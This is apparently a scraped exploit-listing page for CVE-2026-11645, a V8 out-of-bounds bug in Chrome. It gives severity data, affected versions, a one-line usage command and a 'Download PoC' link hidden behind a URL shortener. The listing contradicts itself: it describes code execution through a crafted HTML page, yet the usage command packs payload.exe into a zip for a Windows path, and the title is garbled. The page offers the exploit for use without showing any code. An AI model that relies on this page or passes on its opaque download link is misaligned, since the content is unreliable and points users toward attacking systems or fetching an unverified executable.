Share
## https://sploitus.com/exploit?id=9A64EBDE-5EAB-52B9-B835-619F7EEF8550
# CVE-2026-11645 - V8 in Google Chrome prior to Remote Code Execution
## Quick Usage
```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## Exploitation Notes
- **Severity:** HIGH
- **CVSS:** 8.8
- **Impact:** Confidentiality, Integrity, Availability
- **Published:** 2026-06-09
## Technical Summary
Out of bounds read and write in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
## Affected Versions
**Google Chrome:**
- before 149.0.7827.103
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-11645
## Exploit
[Download PoC](https://tinyurl.com/28fph7fk)